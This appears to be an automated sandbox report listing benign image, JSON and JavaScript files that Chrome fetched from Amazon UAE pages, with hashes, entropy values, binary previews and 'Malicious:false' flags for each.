                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..Qa."Aq.2BR.....#br......3S...CDds.$&4......................................................!1.AQ."2aq...B3b....#R...............?..tQE.E.QB.E.P.U.Y.I..ZX....>......Y .=...Z....7.q...k"^...W.k./2..BQKmh.o..E..l+...HH..n~$.~Ox..j-....\.~.7.Q....}.q.)..........h..D.:...s}....~E.Yo...o....W.....G.>.G.n...'D.o{.`.;..`..{.o.5|...I...d...9..#...w..s.L...u...;{B.....s...l.Tvf.Ew4.l......&..:..=..VZ...NW..L).ki.@.H.`._w,.#\-..V`.R..j.+..(....(.."...1[.ZM......k.J.....y..X...$#...pQd.i..\..A........s...[.-]...0*a-..e.....+D...0....;.,WM..1....qe..Igl{...u......q=9t..U.1>C.d.....p.....K.........r..eK..a........i2[...kK.CN.....^,I.-...M...;..I.%..A..Os".!o.v.*..qN...)g...Y]...$........T...f1...|).......v.<.....l..u@....wA.O.Y...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 255x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10379
                                                                                                                                                                                                                                                                Entropy (8bit):7.93619350611049
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tt5J8r8Z/QNtwjYp1WUFxtUWaUp8/zwRKxMImWgcP2+7QFo59ecNumm9:ttAr2mtwSLtUWrpbRmMpGP2+x9Ml9
                                                                                                                                                                                                                                                                MD5:ACD6DCD05168CDACBD67A3CB9CD590EE
                                                                                                                                                                                                                                                                SHA1:01EFF5E52E3C10030FC2F8F0549076D4C157E110
                                                                                                                                                                                                                                                                SHA-256:7959A6523B868AA405E0D5515429504235C878216492CDF6A039E6DD9E7E4243
                                                                                                                                                                                                                                                                SHA-512:115B86390058FAFA260E4994DB76CB56B07A6CA8FE2902AA17C673C61A172BD4A40F3F294B168DFB895600D2F74B6B2F56C48EF5BD2F451C71C9F7A23D155218
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........X...,b.i...Z......;.0.O..R........RU1..8.P....&&...i+.PtZ]...E.J..J..{...2.z...T[..;....'x.X..u*.-...z....-..1u[#....r."..1....;.........q.d..\i.x,I"+.3..o.<s.~..RR.....Z.0.]b'.1...<..c.v.<%h....\Bm9A...............o....IZUz.v...T.......U..o.....&$N?...>1..EDk..-......#.-..U.C+K.6K...r...=.g...j...m.. Q.6.if]o...../.[.~..5.I".........m....t.....zL9..N.........R{U..y..K....;i...}....t..p..Q:.f.....1....kkk.g.Y..x.-s.9|.hj.=6 ..H2...I...W^.:b.......I.....0g.W y..1..3<g6N../..\...........Z.1t.o5E..}{([.s.+)..j..[..5.v..:...%....-{F..!1...A.(..'....o.....+M.{5.^.T....O.Vcs.....H.?..cq..z....j...k..G.|v..c^{.......&.].2.F........,.u.].c..G[.Y....<.f,........#Q..E.Y...vy.y/h..kn.gZu.;...6r..-...,c...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 175x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5314
                                                                                                                                                                                                                                                                Entropy (8bit):7.928208905623052
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TurzFVrWyn8BGRctEIgICY2GVCXA2zUHBXj6tMiSYvksLV8AXmaIsFaRhaW3:kjiBptEIsYlcUBj61nL5lFaRY4
                                                                                                                                                                                                                                                                MD5:F772561C92F880536B74D7AA86237AE9
                                                                                                                                                                                                                                                                SHA1:41BB673EA20CA70D264B611017368CCB59C1B0D0
                                                                                                                                                                                                                                                                SHA-256:7AE6EEDFED98CB04331C7AD9B32372ED118EBFEA1BFC92CFDDBDF04943C8462F
                                                                                                                                                                                                                                                                SHA-512:F843681E64A116BCED6B03D630499A747D9C381D2058F12A3A03B5B7DEF6812475D9E4F12FB6AEF9E4B7F37FA5E4A37A18D64B46C3798F3EF0C03EC874752401
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61OdLUpG-FL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1.A.."Qq..2Ra..#........BTb...3C.$Dr...................................................!..1."2Aa...RS.Q.#Bq..............?....(...qL-.Z....q&...................5q<;$...C.]....e.M.A......\9...=e.3.y..}P.*...l.('gA....[J-..j9.....c.v.#..S.i..1..R..`yg..._;..J.M.bC.m.F.N.....@....?./.R..Q.!f..M.5...q..5;..[.m.Y.u.&....4...5<sE.......].`...&.qO.a..."....2.7.b......kHTrv:h.]V.....j.t.8...}aX.:...%M....wa\...c...l....=a.)u...k..X..o.m....js,<{^G....*..C..F..5j.t....QE.%.8...b.........~l+h.I....V#.&q.{)..aW.<K....7G......ro.....<z..g..x.*Y(P...OUG}E$.........:K#..T....T..D.....g..5.S.-Ch.H-..."8s..bk........V..Gv...5.............}......5.....26..p..4..x...{B.L..p.W..m.?@.}}...<(..N!E.U...Nq]V.'.|...2..u....FQ?}h.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2756
                                                                                                                                                                                                                                                                Entropy (8bit):7.468756673719947
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0FeyZEYk+59BcIBd2Fc4suIAauzjGVuo+lSGU9XXI1SzrcR/Di2NAUVjn:THiEjsjcg4FcOqn+wg1sh4/n
                                                                                                                                                                                                                                                                MD5:6CEFA9641E87F1D12520B8F67823D517
                                                                                                                                                                                                                                                                SHA1:8770CFC6885DC7BB414FB223AC50A91F80557F8A
                                                                                                                                                                                                                                                                SHA-256:4DBEA6199F4D14F1E27C8CB77E0E0B88AFB408542A2BC77840394403A6A7C321
                                                                                                                                                                                                                                                                SHA-512:75DA897B653C1CFA815F783499FA4A8CDA9D021A02AFADBF9007E22A59CFAC823E991F53C176AC2E05EE4B7833D261852D9EE103C8A1DFD703B57122D62C86B6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.............................................................................................................................+b..c.-s.R.H.B............~..k.|...$m$.J...../.....[.v~+Q.k8l...2\c'@J..>}.h..F.@.P...E...F..xz......'.....%.....5.._zq.....u>..l..J..9..G5f.......]G .v.%|...x..i...y.>u.D.(.......;5..mf......................................................?...,.............................!1. #02@"AQp............. f.J.%q.H..-.Nl......s`.....#.?i......F..&....a.!.E..\.>...{...q.hH..S.%.pX.@.....rW....R"B...........'..0#..qm7.1.......n.c..%.$a.r.qK..r.Dq.w.^..F.QqE..C_....k...u.6...A..:I...T....;....^..k.y....xy.@4q2.QR.w.~...Q.mI..........Jw.GA..3A&.Fd?.L..]K..%.Y,.W7..n.4.-1CM\......V.uoi...<.....i\...{k......[....a.TN..[du..F^..=(...r...-...9|z.Q.-..sR-.I...J.Lp-T....<r.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 153x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7697
                                                                                                                                                                                                                                                                Entropy (8bit):7.955375260524974
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Cr+c0CoM6R+CB7wAvXo6DvuvyRXdlJAe7Guc2:5c0LB7Zg6DuvaNEoF
                                                                                                                                                                                                                                                                MD5:CA8AC606DEAE0D767D994966AD141F9A
                                                                                                                                                                                                                                                                SHA1:49C9B1125CE0DE33594640F497C4FD4FA958F26E
                                                                                                                                                                                                                                                                SHA-256:787B020E06A851BAAAAF9DE375C587D5CB62D556C0D3214A95F0DF96B6B573A0
                                                                                                                                                                                                                                                                SHA-512:65A683CADA7C6E7DED64D4A9C1496A5BA57E65D81D3EFAA64989396B9C9EA894482000564DB143335B029BF2AA9DAF3E563304EA0B4FF63BD3D8EFBAE4D889F8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1..A."Qq#2a....R.....BSb...$3Tr......45Cs...................................................!.1"Aa...2Q..q......#B.............?..t.(.+D....k.n....y..h.G..>..2..kR...$.4..z.h.W.W.....:..|{.l~\?7 ...T.:.V.{..n.`. ..Q..X...=..RhN.Qo5.>....w._...H.n......V..$.3~..j.......P.......W....y.(...<......'r.Zj.......Eg..n.U-....I...?.....!I....#"W...Q..FIl....../.U.Q.%.<6.|.{L.a...D..x...(Io..f<<...t...T-@.WGE.i7:.Z....n.p._...[~_z....l...uTU(.B.>%....s.f.]...tw.5..[..~I.........0,..9.8ea...qZ...Wo<2......7Egq....'..+.j..0./...Kk..{.......xP.a.Y{...~..N."I.......ea...b+......f...>M..kJ..p.5..^..?+P...Fm. 0...<.B6.......;..H.t...M....V.Z..t[Y.%.YR .HPK3.u..L.?['.../.:.....0.@.3...!.....V[......)v.m~.....P..%.67......?uf.%L.. #%X}m..;.Zg..3
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 132 x 235, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13199
                                                                                                                                                                                                                                                                Entropy (8bit):7.954935066574483
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:rH0E+WSNeZU6PNg1A0KxVaF5bXXt7qYs9lcCHihS5WC9tEAxvVy4yK+ezneiTs4Q:rHpXSJSNg1A0KxC5jUDcvuLxvQlziLI
                                                                                                                                                                                                                                                                MD5:4AB8824103871D92816E2A084A05949B
                                                                                                                                                                                                                                                                SHA1:85C43DB1559578D308AE8CEE328CC4483352A649
                                                                                                                                                                                                                                                                SHA-256:958E3858A8659187AD3BC8E723E0C6A1C2415C6AE40023B40CD0289D0E2DF366
                                                                                                                                                                                                                                                                SHA-512:A5705C4177AC542244E6BA77BEDFC19BB69823B16206A1C086A2719DB9239222B8DAA0F808B6535BFCB479D0504C63E1597594D8FC2F9AE7DB03F0AE72242DE6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............>(....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b3e090dd-84c4-4674-9fe3-59f5a5bd6db7" xmpMM:DocumentID="xmp.did:AB1D71FA873C11E6A935C06C3689B1A4" xmpMM:InstanceID="xmp.iid:AB1D71F9873C11E6A935C06C3689B1A4" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f301801f-ea81-4562-919b-633c17b77694" stRef:documentID="adobe:docid:photoshop:9b6ca99e-cfa6-1179-9606-c490b53d51cf"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z..k../.IDATx..}.x
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):23
                                                                                                                                                                                                                                                                Entropy (8bit):3.914866303883101
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YIzLKFjJ4:YI/KZJ4
                                                                                                                                                                                                                                                                MD5:E66A7A6C91E2C26803F3F49FEB7A883F
                                                                                                                                                                                                                                                                SHA1:4AE440FF2BD4594A3CACAEB1EDD29444B781A3ED
                                                                                                                                                                                                                                                                SHA-256:8FD54EEE4277F1327015CC0BCAED8A878BF44D1804364CD5D93DFAB9E2D1A5AF
                                                                                                                                                                                                                                                                SHA-512:9A00E2AA47634A1AA8B4234F7692CA71521929EE31A225A460DD5A7BD46F9196F688467B8303C5EF5D6CFF32D25B85F511BD741CE99A3FDA8D76A66591A1DC2E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"message":"Not Found"}
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D89%26pc0%3D796%26ld0%3D796%26t0%3D1723469095245%26sc1%3Dportal-bb%26pc1%3D20%26ld1%3D20%26t1%3D1723469094573%26sc2%3Dp13n-zg-list-carousel-desktop_zeitgeist-lists_0%26bb2%3D229%26be2%3D234%26pc2%3D2670%26ld2%3D2670%26t2%3D1723469097119%26sc3%3Dp13n-zg-list-carousel-desktop_zeitgeist-lists_1%26bb3%3D234%26be3%3D288%26pc3%3D2670%26ld3%3D2670%26t3%3D1723469097119%26sc4%3Dp13n-zg-list-carousel-desktop_zeitgeist-lists_2%26bb4%3D291%26be4%3D352%26pc4%3D2670%26ld4%3D2670%26t4%3D1723469097119%26sc5%3Dp13n-zg-list-carousel-desktop_zeitgeist-lists_3%26bb5%3D367%26be5%3D444%26pc5%3D2670%26ld5%3D2670%26t5%3D1723469097119%26sc6%3Dp13n-zg-list-carousel-desktop_zeitgeist-lists_4%26bb6%3D448%26be6%3D499%26pc6%3D2709%26ld6%3D2709%26t6%3D1723469097158%26sc7%3Dp13n-zg-list-carousel-desktop_zeitgeist-lists_5%26bb7%3D502%26be7%3D533%26pc7%3D2710%26ld7%3D2710%26t7%3D1723469097159%26sc8%3DcsmCELLSframework%26bb8%3D632%26pc8%3D632%26ld8%3D632%26t8%3D1723469095081%26sc9%3DcsmCELLSpdm%26bb9%3D632%26pc9%3D633%26ld9%3D633%26t9%3D1723469095082%26sc10%3DcsmCELLSvpm%26bb10%3D633%26pc10%3D633%26ld10%3D633%26t10%3D1723469095082%26sc11%3DcsmCELLSfem%26bb11%3D633%26pc11%3D634%26ld11%3D634%26t11%3D1723469095083%26sc12%3Due_sushi_v1%26bb12%3D634%26pc12%3D634%26ld12%3D634%26t12%3D1723469095083%26sc13%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb13%3D796%26pc13%3D4803%26ld13%3D4803%26t13%3D1723469099252%26ctb%3D1:24800
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4983
                                                                                                                                                                                                                                                                Entropy (8bit):7.917430014322651
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TCpEsyaqQDp3ZH3SmKH78vDKChIjZRkl85gpQvczu/6xDKcS8hsDazh8:4l3NlKHAvDKE6Rkl8WjRVKkWe8
                                                                                                                                                                                                                                                                MD5:A711F9545F461C8ECE6C86140F55F392
                                                                                                                                                                                                                                                                SHA1:EED1316F0878B530C8192ABE45024ABF9F3B1E19
                                                                                                                                                                                                                                                                SHA-256:43EBCC66E541A5A43F26C5B6C5AF483E5FA518AB711AA6927D53287E5C22F47A
                                                                                                                                                                                                                                                                SHA-512:9766CB804A7D866E351066DC5E110448724900276B719090B1E9E45EDDCAC3AE26704AD4E739AF5F5C02CFFE7DCA4A5A9A0F0AA7A55967C014D54DD56622E78F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1AQ.."q....2ab.3BRr...#Cs.4...%c................................................!1.A2."Qq.a3BR............?..-.B.B..........l.....t..qk..4.uA............S.|z78.:..V....U..!.{.s..TF...'..y...A._.S.b.*!...{..yX....5.+.u.vQ.D.x..buN....... ..~.)s`!..S .E.R..1].[i6.x...............Hd.....<.........'h?3....]..'m$...2...F....^.._C.*...O......6....7...R......(u]"....s..\....#..n.E.r.)U..)....J...d..p$p.p.....$.....!.!.@.B.....?..ee+9....sw0LWB..Y.I'..../..t.'.==7.Q2:.i7.>Ju.Hi3..2\.pp-..Ks...\.|o.U.l.F]...!..;;..z..C\.......Q...:.....7...i.9..0...W.ZO...#............b.W..A-.....q.j.;..w.........kj@..IG.hev*@.8..vo@.x.f.J.7.G..[..rQf.$..cj...#..W...<.Z..5..s.9..mu.+X.2\..I..[<B..<vF.U.H...CCN.....~.~6..Zh...u,$..UHK.Y)$.......S}*...=.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):700487
                                                                                                                                                                                                                                                                Entropy (8bit):5.5818702952501935
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:iu6Pm2t8CL5FFTU58dWWnlpHUabaWo/m9tfnt8Tc:iTPmEn5FFTU58dWWnXHzcWqc
                                                                                                                                                                                                                                                                MD5:88A47B6F40FD040897D5BF68ACB019D9
                                                                                                                                                                                                                                                                SHA1:F52130A5FF9C804570DB87CA7E481A61301BDAE5
                                                                                                                                                                                                                                                                SHA-256:AA225C51716DFF7272730BF59F25668E5E3E036E4F66688F10ADC75832CFAA35
                                                                                                                                                                                                                                                                SHA-512:D2D6993A808BCB38CBF7CE6501799CA03C5B40BD02CA0FEF02824C1D08E09CECB4E27BC116811266B10CD967AEF5E94AEA3C80D706CFC83BE082AD6C3FDBD6D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71YWhKvDA+L.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21cN4KWOfCL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&HUTipDuy"
                                                                                                                                                                                                                                                                Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, baseline, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9484
                                                                                                                                                                                                                                                                Entropy (8bit):7.867411824671817
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:q8KIzd4USNdPO/trSgHYDqs0a/6iGwskNpCdqDyP5ve:q8KOd1edPIHUiCqwsEpiPs
                                                                                                                                                                                                                                                                MD5:C8407BB0F31D12AF666791231B078919
                                                                                                                                                                                                                                                                SHA1:B00BD1145454A48D7EEFB8F5251D1ECFDC791012
                                                                                                                                                                                                                                                                SHA-256:2C420C04C72907D95082D29EF4D50DB13D4AD40A44F3649C842CFE5ECBE5B30F
                                                                                                                                                                                                                                                                SHA-512:6B0D4EF1EE10ED92AA320D71C7CD7F24925A2FE0A98D47B433692A342FD25499A7F1DF59F51FCC14BE702095490D3836A954A6E32EBD530497648305FBF7A9F8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/39/AHS_UAE/2022/GW/SWM/CarRental-SWM-en-400x39._CB630585803_.jpg
                                                                                                                                                                                                                                                                Preview:.............................................................................................................................................2....Adobe.d...........'......................................................................................................!...."1A......#$%&Qa'()*23456789:BCDEFGHIJRSTUVWXYZbcdefghijqrstuvwxyz..........................................................................................8S............!....1A..."Q#2aq.........$%&'()*3456789:BCDEFGHIJRSTUVWXYZbcdefghijrstu..vwxyz..........................................................................................?..=..Eb..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b....=..Eb..Xa..1a....c.f..zZ...e..*..._..a.5+B.!.....6...l..k....jt.X.f.9.CS......UW.....*X6..........H...)qK.-*`in[..],.........TD...!NG@.O..`...@..C%.).Zr..d.VS..TU.=.P.y ...($..n..g)..X.w.zi.XL...`..@\C 1..v.%...B......!.T1D8..n...H......8.8/T.S".....F...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10896
                                                                                                                                                                                                                                                                Entropy (8bit):6.053755322656456
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:fqXLqXQJ0IgDqutxnw2UQxmVeXud/uKDG5x/X9EE2XbzhkEmk/lqqRrYQf5d5P:faeXO07nn7mVIuJLG5hX9ZEdkgD5f5dR
                                                                                                                                                                                                                                                                MD5:980CD435277A7621B6118CBDB85D6309
                                                                                                                                                                                                                                                                SHA1:FE93136BC14F0E236032FB0065BC55B034AFEEE1
                                                                                                                                                                                                                                                                SHA-256:13973BAFA1151CD2034520D96ECC4E8F5A0E2E80E0282758BCD04F426A64DC8A
                                                                                                                                                                                                                                                                SHA-512:AE481508B42438ACCD205B774C630B14A1DF4ECF960CEF339A8F9C6924D97EA7586FE4C41E1CCC44EBCB3FEB087A545105840D268F35CFE9FF5EA3E3E909F181
                                                                                                                                                                                                                                                                Malicious:false
